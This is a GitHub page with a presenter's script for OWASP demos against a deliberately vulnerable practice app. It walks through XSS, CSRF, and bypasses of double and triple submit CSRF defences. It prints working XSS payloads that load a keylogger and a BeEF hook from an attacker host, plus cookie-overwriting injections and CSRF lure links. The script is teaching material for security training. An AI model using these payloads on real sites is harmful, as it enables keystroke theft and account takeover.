-
Notifications
You must be signed in to change notification settings - Fork 8
/
OWASP_1-Liner_Demos.txt
127 lines (75 loc) · 3.19 KB
/
OWASP_1-Liner_Demos.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
BadGuy
Chrome https://local.1-liner.org:8444/vulnerable/
https://local.1-liner.org:8444/admin/ <-- Change name to BadGuy
https://attackr.se:8444 <-- Accept cert
https://lolsite.com:8444 <-- Accept cert
John
FF https://local.1-liner.org:8444/vulnerable/
https://attackr.se:8444 <-- Accept cert
https://lolsite.com:8444 <-- Accept cert
*** XSS fight
Show username "John" in FF and "BadGuy" in Chrome.
BadGuy posts:
I love JavaScript<img src=1 onerror=if(document.cookie.indexOf("BadGuy")===-1){document.cookie="nickNameVulnerable=Moron;domain=.1-liner.org;path='/'";} height=0 width=0 />
John posts:
It's EcmaScript, fool<img src=1 onerror=$.getScript('https://attackr.se:8444/attacks/keylogger.js') height=0 width=0 />
Show the server log and let BadGuy type some stuff in the input field (keylogger)
Make sure you running BeEF (execute ./beef in the BeEF folder)
BadGuy posts:
Besserwisser<img src=1 onerror=$.getScript('https://attackr.se:8444/attacks/hook.js') height=0 width=0 />
BadGuy opens:
http://attackr.se:3000/ui/panel
Reset 1-liner DB, reload John, and switch to BadGuy
// "oneLiner": $.encoder.encodeForHTML(oneLinerStr), // Proper encoding
Besserwisser<img src=1 onerror=$.getScript('https://attackr.se:8444/attacks/hook.js') height=0 width=0 />
Remove encoding fix and switch to BadGuy
*** CSRF + XSS fight
BadGuy posts:
LOL, check the dancing pig: https://lolsite.com:8444/attacks/csrf/csrf.html
Point out that the link goes to another domain (it will auto-post cross-domain)
John clicks
BadGuy posts:
Über LOL, check out the cat: https://lolsite.com:8444/attacks/csrf/csrf2.html
John clicks
BadGuy opens:
http://attackr.se:3000/ui/panel
*** Multi-step, semi-blind CSRF
Make sure BadGuy is logged in at Amazon (remember me)
John posts:
Hey BadGuy, check this out: https://attackr.se:8444/attacks/csrf/amazon/csrfMultiDriver.html
*** Subdomain XSS for double submit bypass
BadGuy:
https://local.1-liner.org:8444/vulnerable/
June:
https://local.1-liner.org:8444/securish/
Make sure webapp/securish/index.jsp uses double and not triple submit (check triple submit is commented out in two places)
June posts:
Hey, this works!
Kill the cookie named cookieToken.
Press a few returns in the log to get space.
June posts:
Will this work?
Show server log.
Reload https://local.1-liner.org:8444/securish/
June posts:
It works again
June:
https://other.1-liner.org:8444/vulnerable/simpleXSS.jsp
Show June's cookieToken cookie.
Search for:
<script>$.cookie("cookieToken", "bogus", {path: "/", domain: ".1-liner.org"});</script>
Again, show June's cookieToken cookie.
BadGuy posts:
OMG! https://attackr.se:8444/attacks/csrf/csrf3.html
Show CSRFed oneliner
*** Triple submit and bypass via cookie jar overflow ***
Bring in triple submit cookie in webapp/securish/index.jsp (bring back out commented code in two places)
June:
Reload https://local.1-liner.org:8444/securish/
Show random cookie
June:
https://other.1-liner.org:8444/vulnerable/cookieWipeXSS.jsp
Overflow cookie jar.
BadGuy posts:
Ha, ha! https://attackr.se:8444/attacks/csrf/csrf4.html
Show CSRFed oneliner